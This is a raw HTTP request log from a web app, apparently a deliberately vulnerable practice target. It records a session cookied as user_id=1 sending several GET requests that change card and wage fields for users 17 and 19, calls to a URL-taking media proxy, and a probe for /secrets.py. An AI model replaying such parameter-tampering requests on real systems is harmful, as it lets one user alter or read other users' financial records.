Method: GET
[2026-03-19 17:36:02] === HTTP Request ===
[2026-03-19 17:35:49] Salary page accessed - IP: 172.30.0.12:35844
===================
X-Forwarded-For: 79.139.135.199
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Fetch-Site: same-origin
Priority: u=4
Cookie: auth=sess_1773937269413174371; user_id=1
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Mode: cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35844
Path: /salary
URL: /salary
Method: GET
[2026-03-19 17:35:49] === HTTP Request ===
[2026-03-19 17:35:49] Salary page accessed - IP: 172.30.0.12:35844
===================
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Cookie: auth=sess_1773937269413174371; user_id=1
Accept-Encoding: gzip, deflate, br
Via: 2.0 Caddy
Sec-Fetch-User: ?1
Priority: u=0, i
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35844
Path: /salary
URL: /salary
Method: GET
[2026-03-19 17:35:49] === HTTP Request ===
[2026-03-19 17:34:53] Salary page accessed - IP: 172.30.0.12:35844
===================
Sec-Fetch-Site: same-origin
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Dest: empty
Priority: u=0
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Cookie: auth=sess_1773937269413174371; user_id=1
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35844
Path: /salary
URL: /salary
Method: GET
[2026-03-19 17:34:53] === HTTP Request ===
[2026-03-19 17:31:42] Update Financial Info - user_id: 19, card_number: 1243564, card_holder: 123, expiry_date: 12123, cvv: 123
===================
Te: trailers
Priority: u=0
Cookie: auth=sess_1773937269413174371; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46810
Query: user_id=17&card_number=1243564&card_holder=123&expiry_date=12123&cvv=123
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=1243564&card_holder=123&expiry_date=12123&cvv=123
Method: GET
[2026-03-19 17:31:42] === HTTP Request ===
[2026-03-19 17:30:55] Update Financial Info - user_id: 17, card_number: 1243564, card_holder: 123, expiry_date: 12123, cvv: 123
===================
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Te: trailers
Cookie: auth=sess_1773937269413174371; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Mode: cors
Priority: u=0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46810
Query: user_id=17&card_number=1243564&card_holder=123&expiry_date=12123&cvv=123
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=1243564&card_holder=123&expiry_date=12123&cvv=123
Method: GET
[2026-03-19 17:30:55] === HTTP Request ===
[2026-03-19 17:30:15] Update Financial Info - user_id: 17, card_number: 1243564, card_holder: 123, expiry_date: 12123, cvv: 123
===================
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Via: 2.0 Caddy
Cookie: auth=sess_1773937269413174371; user_id=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46810
Query: user_id=17&card_number=1243564&card_holder=123&expiry_date=12123&cvv=123
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=1243564&card_holder=123&expiry_date=12123&cvv=123
Method: GET
[2026-03-19 17:30:15] === HTTP Request ===
[2026-03-19 17:29:55] Update Financial Info - user_id: 17, card_number: 1243564, card_holder: 123, expiry_date: 12123, cvv: 123
===================
X-Forwarded-Proto: https
Via: 2.0 Caddy
Cookie: auth=sess_1773937269413174371; user_id=1
Accept-Encoding: gzip, deflate, br
Accept: */*
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Te: trailers
Sec-Fetch-Mode: cors
Priority: u=0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46810
Query: user_id=17&card_number=1243564&card_holder=123&expiry_date=12123&cvv=123
Path: /cabinet/update-cad-info
URL: /cabinet/update-cad-info?user_id=17&card_number=1243564&card_holder=123&expiry_date=12123&cvv=123
Method: GET
[2026-03-19 17:29:55] === HTTP Request ===
[2026-03-19 17:29:42] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1773937269413174371; user_id=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Te: trailers
Sec-Fetch-Mode: cors
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46810
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-19 17:29:42] === HTTP Request ===
[2026-03-19 17:29:39] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:46810
===================
Te: trailers
Sec-Fetch-Dest: empty
Priority: u=4
Accept-Encoding: gzip, deflate, br
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
Cookie: auth=sess_1773937269413174371; user_id=1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46810
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-19 17:29:39] === HTTP Request ===
[2026-03-19 17:29:35] Login page accessed - IP: 172.30.0.12:46810
===================
Sec-Fetch-User: ?1
Cookie: auth=sess_1773937269413174371; user_id=1
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
X-Forwarded-Proto: https
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Priority: u=0, i
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46810
Path: /login
URL: /login
Method: GET
[2026-03-19 17:29:35] === HTTP Request ===
[2026-03-19 17:29:32] Main page accessed - IP: 172.30.0.12:46810
===================
X-Forwarded-For: 79.139.135.199
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Priority: u=4
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
Cookie: auth=sess_1773937269413174371; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46810
Path: /
URL: /
Method: GET
[2026-03-19 17:29:32] === HTTP Request ===
[2026-03-19 17:29:32] Main page accessed - IP: 172.30.0.12:46810
===================
Te: trailers
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Mode: navigate
Priority: u=0, i
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Cookie: auth=sess_1773937269413174371; user_id=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46810
Path: /
URL: /
Method: GET
[2026-03-19 17:29:32] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50019
Path: /secrets.py
URL: /secrets.py
Method: GET
[2026-03-19 17:22:55] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Accept: */*
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Pragma: no-cache
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Site: same-origin
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54944
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-19 17:11:30] === HTTP Request ===
===================
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Mode: no-cors
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Site: same-origin
X-Forwarded-Proto: https
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: script
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54960
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-19 17:11:30] === HTTP Request ===
===================
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Accept-Encoding: gzip, deflate, br
Pragma: no-cache
Cache-Control: no-cache
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: style
Priority: u=2
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54944
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-19 17:11:30] === HTTP Request ===
[2026-03-19 17:11:30] Login page accessed - IP: 172.30.0.12:54944
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Priority: u=0, i
Cache-Control: no-cache
Pragma: no-cache
Upgrade-Insecure-Requests: 1
Te: trailers
Sec-Fetch-Dest: document
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54944
Path: /login
URL: /login
Method: GET
[2026-03-19 17:11:30] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Fetch-Mode: no-cors
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Pragma: no-cache
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Dest: script
Cache-Control: no-cache
Accept: */*
Sec-Fetch-Site: same-origin
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54944
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-19 17:11:29] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54944
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-19 17:11:29] === HTTP Request ===
===================
Via: 2.0 Caddy
Sec-Fetch-Dest: script
Cache-Control: no-cache
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Accept: */*
X-Forwarded-For: 79.139.135.199
Te: trailers
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54944
Path: /static/defects.js
URL: /static/defects.js
Method: GET
[2026-03-19 17:11:29] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Dest: style
Pragma: no-cache
Cache-Control: no-cache
Accept: text/css,*/*;q=0.1
Sec-Fetch-Mode: no-cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Site: same-origin
Priority: u=2
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54944
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-19 17:11:29] === HTTP Request ===
[2026-03-19 17:11:29] Defects page accessed - IP: 172.30.0.12:54944
===================
Te: trailers
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Priority: u=0, i
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54944
Path: /defects
URL: /defects
Method: GET
[2026-03-19 17:11:29] === HTTP Request ===
[2026-03-19 17:09:06] Defect detail page accessed - defect_id: x, IP: 172.30.0.12:33320
===================
Sec-Fetch-Dest: image
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Priority: u=5, i
Via: 2.0 Caddy
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Cookie: auth=sess_1773937269413174371; user_id=1
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33320
Path: /defects/x
URL: /defects/x
Method: GET
[2026-03-19 17:09:06] === HTTP Request ===
[2026-03-19 17:09:06] Media proxy request - url: https://media.vulnberries.ru/media?filename=28, IP: 172.30.0.12:33318
===================
Sec-Fetch-Dest: empty
If-Modified-Since: Thu, 19 Mar 2026 16:40:12 GMT
Priority: u=4
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-For: 79.139.135.199
Cookie: auth=sess_1773937269413174371; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate, br
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33318
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D28
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D28
Method: GET
[2026-03-19 17:09:06] === HTTP Request ===
[2026-03-19 17:09:06] Defect detail page accessed - defect_id: fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72, IP: 172.30.0.12:33318
===================
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Te: trailers
X-Forwarded-Proto: https
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1773937269413174371; user_id=1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33318
Path: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
URL: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
Method: GET
[2026-03-19 17:09:06] === HTTP Request ===
[2026-03-19 17:09:03] Defects page accessed - IP: 172.30.0.12:33318
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate, br
Priority: u=0
Sec-Fetch-Dest: empty
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Via: 2.0 Caddy
Cookie: auth=sess_1773937269413174371; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33318
Path: /defects
URL: /defects
Method: GET
[2026-03-19 17:09:03] === HTTP Request ===
[2026-03-19 16:41:21] Defect detail page accessed - defect_id: x, IP: 172.30.0.12:56824
===================
Cookie: auth=sess_1773937269413174371; user_id=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Priority: u=5, i
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-For: 79.139.135.199
Accept-Encoding: gzip, deflate, br, zstd
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Sec-Fetch-Site: same-origin
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56824
Path: /defects/x
URL: /defects/x
Method: GET
[2026-03-19 16:41:21] === HTTP Request ===
[2026-03-19 16:41:21] Media proxy request - url: https://media.vulnberries.ru/media?filename=28, IP: 172.30.0.12:47008
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
If-Modified-Since: Thu, 19 Mar 2026 16:40:12 GMT
Cookie: auth=sess_1773937269413174371; user_id=1
Sec-Fetch-Site: same-origin
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Te: trailers
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Priority: u=4
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47008
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D28
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D28
Method: GET
[2026-03-19 16:41:21] === HTTP Request ===
[2026-03-19 16:41:21] Defect detail page accessed - defect_id: fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72, IP: 172.30.0.12:47008
===================
Sec-Fetch-Mode: navigate
Cookie: auth=sess_1773937269413174371; user_id=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Via: 2.0 Caddy
Priority: u=0, i
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Te: trailers
Sec-Fetch-User: ?1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47008
Path: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
URL: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
Method: GET
[2026-03-19 16:41:21] === HTTP Request ===
[2026-03-19 16:41:04] Defect detail page accessed - defect_id: x, IP: 172.30.0.12:47008
===================
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Cookie: auth=sess_1773937269413174371; user_id=1
Sec-Fetch-Site: same-origin
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Dest: image
Priority: u=5, i
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47008
Path: /defects/x
URL: /defects/x
Method: GET
[2026-03-19 16:41:04] === HTTP Request ===
[2026-03-19 16:41:01] Defect detail page accessed - defect_id: x, IP: 172.30.0.12:56824
===================
Priority: u=5, i
Cookie: auth=sess_1773937269413174371; user_id=1
X-Forwarded-For: 79.139.135.199
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56824
Path: /defects/x
URL: /defects/x
Method: GET
[2026-03-19 16:41:01] === HTTP Request ===
[2026-03-19 16:41:01] Media proxy request - url: https://media.vulnberries.ru/media?filename=28, IP: 172.30.0.12:47008
===================
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
X-Forwarded-Host: admin.vulnberries.ru
Priority: u=4
Cookie: auth=sess_1773937269413174371; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
If-Modified-Since: Thu, 19 Mar 2026 16:40:12 GMT
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47008
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D28
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D28
Method: GET
[2026-03-19 16:41:01] === HTTP Request ===
